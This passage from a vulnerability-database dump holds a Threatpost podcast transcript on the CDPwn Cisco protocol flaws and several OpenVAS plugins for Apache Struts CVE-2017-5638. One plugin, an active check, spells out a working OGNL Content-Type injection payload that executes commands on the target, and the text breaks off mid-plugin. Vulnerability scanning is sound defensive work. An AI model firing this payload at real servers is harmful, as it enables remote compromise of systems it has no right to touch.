very low in the stack, very basic in how the network, the packets are built from this protocol, and it\u2019s actually a layer where researchers don\u2019t look at too much. Most of the vulnerabilities are either in application layer, in rare cases they are the transportation layer, transport layer; and then, what is called the data link layer, or the layer 2, is where you have dozens of protocols, used by network appliances, switches and routers. And these are kind of an attack surface that is not enough researched.\n\nCisco Discovery Protocol is one of these and the vulnerabilities themselves are critical. When we found them, they were not known to Cisco or any other individual as far as we know. And we\u2019ve worked with Cisco on the patch mitigation process. And so when we are announcing this today, customers of Cisco are advised to go ahead and install the patches as quickly as possible.\n\nAnd so you asked about the wide array of devices impacted by this and that\u2019s true; you find this in the Cisco switches and routers; IP phones from Cisco; and these are devices that have a complete hold on the market in these fields. When you look at IP phones, for example, Cisco advertises that over 95 percent of Fortune 500 companies use Cisco communication solutions. So that these are the Cisco IP phones, for example, and you would find them in government offices and you\u2019d find them in the White House, and in the Situation Room, but also throughout corporate and trade floors and whatever. They\u2019re really prevalent devices.\n\nThat\u2019s the IP phone but Cisco network equipment, the switches and the routers, are very, very popular as well and the impact is severe in terms of what kind of attacks attackers can actually pull off using these vulnerabilities.\n\n**LO: **And I want to talk about that in a second. But I just wanted to ask you real quick, you mentioned before that CDP, there hasn\u2019t been a whole lot of research around it. I wanted to ask, you how you first came across these vulnerabilities and what caused you to look further into CDP as a potential threat surface for vulnerabilities. Because as you said, it usually is kind of the application layers and some other areas that vulnerabilities are discovered in, so how did you first come across these flaws?\n\n**BS:** Yeah so actually, what piqued our interest for looking into this was a Cisco security advisory published around two years ago, that detailed some vulnerabilities that they found in LDP, which is another Discovery Protocol \u2013 not CDP protocol \u2013 but another Discovery Protocol, pretty similar to CDP. And this advisory mentioned that Cisco found some bugs that could lead to denial of service in a wider array of devices. And although this wasn\u2019t what is called RCE vulnerability, or remote code execution, what they discovered was some sort of buffer overflow. And we felt that if they internally found something that actually parses these packets, the LDP packets, in a way that can lead to vulnerabilities, then we might find similar stuff that can lead to critical vulnerabilities.\n\nAnd really the reason that we looked at it, other than this initial lead we had through Cisco\u2019s advisory, was the understanding that an attacker that has a vulnerability in these types of protocols has the ability to break network segmentation. Part of what we do is to try understand the havoc that IoT devices might have on networks. And network segmentation is actually a very basic design tool for networks to prevent certain devices, such as IoT devices, from crossing the bounds over from the IoT segment into corporate segments. And in CDP and LDP, and these discovery protocols, layer 2 protocols, they\u2019re actually parsed by the network of clients, regardless of the segment, regardless of if the device connected to it is an IoT segment, or in the corporate segment. So yeah, the understanding here was \u201cokay, this is interesting,\u201d Cisco found something in LDP, this would mean an IoT device could attack the switch even if it\u2019s segmented, then having access to this switch, it can move over to other segments. So that was our motivation to try and understand if this attack surface might contain vulnerabilities, like the ones eventually that we found.\n\n**LO: **Right. And that was for me a huge highlight from the research was that because the network infrastructure itself was at risk and exploitable that network segmentation, which is usually a big security strategy is at risk now. So I thought that was a big implication here.\n\nI wanted to focus in on the five vulnerabilities that are kind of at the heart of this and there were four remote code execution flaws and then one denial of service flaw. So can you talk a little bit more about these vulnerabilities and what an attacker would need to exploit them, how difficult they are to exploit and if there is one vulnerability that\u2019s particularly severe or easier than the others to exploit.\n\n**BS:** So unfortunately, the vulnerabilities themselves are not that complicated. There are standard buffer overflows that you would find, bugs you will find from time to time, and exploiting them takes some effort, but actually, it\u2019s not that difficult. There are some mitigations in these devices to make it harder for attackers to actually exploit the vulnerabilities but they are not that difficult to bypass. So there are the four RCEs, the denial of service one is also something with a few CDP packets maliciously crafted, an attacker can take down switches and routers, and completely stop their functionality. And the RCE ones are just a matter of sending a couple of packets to the affected devices in order to gain code execution on your devices.\n\nI would say that the most severe of these four is the one that affects IP phones, they have an additional bug other than the memory corruption part. They parse broadcast CDP packets and unicast CDP packets as if they were regular standard CDP packets, which are normally very specific multicast packets. And that means for attackers that you don\u2019t need to find the IP phone that you want to target inside the network, you can simply send a broadcast packet, that will go out to the entire network. And the IP phones that are affected by this will parse these packets that will otherwise be regarded as invalid packets. They would parse them nonetheless and the vulnerability will be triggered on them almost simultaneously throughout the networks. The attacker can sent one broadcast packet, it will either cause denial of service or code execution, depending on the exploit. And then you will have an army of IP phones into the network that you can either eavesdrop on the calls, carry out additional attacks from, steal sensitive data.\n\nIP phones are really the most enterprise grade type of IoT device that you would have a network, Cisco is an enterprise-oriented company. But nevertheless, they might be vulnerable. And they do contain confidential data and they might also be used as a way to have a hold inside the network, to carry out further attacks from them. And the most interesting part is that they are really, really prevalent.\n\n**LO:** And just to clarify for our listeners, that vulnerability is, I believe it was tied to CVE-2020-3111. So that\u2019s the one that specifically impacts the Cisco IP phones and is a RCE and denial of service flaw, but I could definitely see that one being severe. So can you walk us through the potential impact of these vulnerabilities if exploited? I know there\u2019s kind of a lot to unwind there you talked earlier about the issues that it could cause a network segmentation, but then also, there were issues around data exfiltration attacks and some other attacks. So can you walk us through that?\n\n**BS:** Yeah, so the first point for an attacker to take advantage of the vulnerability is to have some foothold inside the network. So it\u2019s not an attack that necessarily is coming from the internet. The attacker needs to have some access, but if you have some very low grade IoT device sitting inside the network, part of your threat model already is that these devices might be compromised. But really what protects today what is used to protect you from these devices running havoc on your network is network segmentation. So the the threat is that once the compromised IoT device tries to exploit CDPwn, it can target the switch that it is connected to, and then the switch from there all kinds of attacks can be carried on. It\u2019s a very good position for an attacker to be on. It allows him to capture traffic that traverses through the switch. If it\u2019s plaintext traffic that might include confidential data, anything that\u2019s of value for the attacker. It\u2019s also a point where an attacker can carry out man-in-the-middle attacks if the device inside the network is going out to the internet to a specific service, or internally through the service inside the network. The attacker can change the traffic that traverses through the switch in a way that the man-in-the-middle attack might be beneficial for him, it can be used to send send malware inside specific JavaScript code that is rendered in the browser or anything of that sort. There are a multitude of attacks that are very efficient once you have a man-in-the-middle position inside the network.\n\nBut then, you can also move laterally, the segmentation that previously limited these attacks only to the IoT segment, now are no longer in place. Inside the switch, you can go to any segments that you\u2019d like. Or it can completely put all the devices in one segment and they can now also talk to one another, although originally they were on separate segments. Last, there is also the impact to IP phones and IP cameras. And like I mentioned the for example, on the IP phones, they are vulnerable to the broadcast attack as well, so from the switch, you can also send the broadcast CDP packet that will trigger that the vulnerabilities on the IP phones and that would be the next step getting access to these corporate assets that might contain confidential data. And all from a very strong position inside the network, the core space, or any other switch inside the network that is not regularly examined, you don\u2019t expect these types of devices to be compromised. And for that reason, they\u2019re not monitored and not tracked as much as your corporate assets.\n\n**LO: **Right. And I mean, speaking of corporate assets, you know, like you mentioned before, many times, you know, a lot of these devices are used primarily by enterprises. And that kind of heightens these types of attacks and their severity, like man-in-the-middle, like data exfiltration, and kind of what that means for enterprise organizations that might be open to these types of threats. What can enterprise organizations do to secure against this type of attack?\n\n**BS: **Monitoring these types of devices, treating them as endpoints that might be compromised as well, not only the Windows devices and the mobile devices We are aware of that consumer grade IoT, whether it\u2019s an Amazon Echo, or if some tablet of sort or anything of that nature, we see these devices as IoT, and we have learned that these might be compromised. And there is a growing consensus that securing these types of devices is needed. But when you try to define IoT, it really has no bounds; any device, any embedded device that does not have an end security agent on it, in some ways, it\u2019s an IoT device. So for every organization, it looks like a benign device, the pipeline of the network, something of that sort, it can also be vulnerable, attackers can attack it as well. And having attacked it they can use it as a foothold inside the network \nto carry out additional attacks.\n\nSo, in the VoIP phones and enterprise grade IP cameras from Cisco, these are also at the end of the day computers that parse packets might be vulnerable to attacks and can be used for further attacks. I think the solution is always to find a product that monitors all types of these unmanaged devices in a way that can detect if something wrong has occurred, if something out of normal behavior has occurred. But also obviously, whenever a vulnerability is published, quickly patch, that\u2019s the best way to stay secure.\n\n**LO:** Right. And I know you spoke a little bit about IoT security. And it seems like that is also kind of a big part of this research and how IoT security issues and connected device issues, the impact that they can have on corporate networks. Because when you think about it, a lot of businesses have all kinds of devices that have popped up over the years that are connected, that they don\u2019t even necessarily think of, like surveillance cameras, etc, etc. So that\u2019s that\u2019s a really good point as well. And I finally I wanted to ask you about the process of disclosure with Cisco and the patches that have been deployed at this point, what was the process of disclosure in terms of the time frame and the patches that are available now?\n\n**BS:** It was rather a long process. But part of that was how this disclosure went about. So at the end of August, we first disclosed the vulnerabilities; at the time we found them on the Nexus switches and IRS6R routers. And Cisco was very good to work with and they developed patches quickly. But then, during the disclosure, we actually found that the similar vulnerabilities exist in IP phones and cameras. And for that reason that the disclosure process went a bit longer, way over 100 days. And yes, patches have been deployed by Cisco, some of the upgrades to these devices have already been put out by Cisco. But today, they are also having their security advisories that mention what versions are patched and the different patches, the affected devices are being released today as well.\n\n**LO:** Is there any other takeaways from your research into CDPwn, or the vulnerabilities or implications here that you want to mention from your perspective, Ben?\n\n**BS:** Um, yeah, I think that when we look at network, when we look at all of the variety of devices that we have, any of the devices that are unmanaged, we need to look at them in the same way, they\u2019re not different. All of them are computers that might open to attack. That\u2019s one hand and the other end of it is the attack surface. There are just endless types of layer 2 protocols and CDP is one of them. But there is actually a very large attack surface there that has been neglected. But I think the research community needs to do more in looking at these protocols. And network segmentation, at the end of the day, is a strong solution for IoT, and other security problems are solved by it, but we need to make sure that it really stands strong against all kinds of attacks. CDPwn is just one of them. So looking at these protocols, understanding whether they present a risk to network appliances, is essential for that process to be as strong as it can be.\n\n**LO:** Absolutely. Well, Ben, thank you so much for coming onto the Threatpost podcast today to talk about these newly disclosed vulnerabilities in Cisco equipment.\n\n**BS:** Thank you for having me.\n\n**LO:** And once again, this is Lindsay O\u2019Donnell-Welch with Threatpost here talking today with Ben Seri, VP of research at Armis. Catch us next week on the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-02-05T16:00:56", "type": "threatpost", "title": "Critical Cisco 'CDPwn' Protocol Flaws Explained: Podcast", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3111", "CVE-2020-5135"], "modified": "2020-02-05T16:00:56", "id": "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "href": "https://threatpost.com/behind-cdpwn-discovering-critical-cisco-protocol-flaws/152530/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 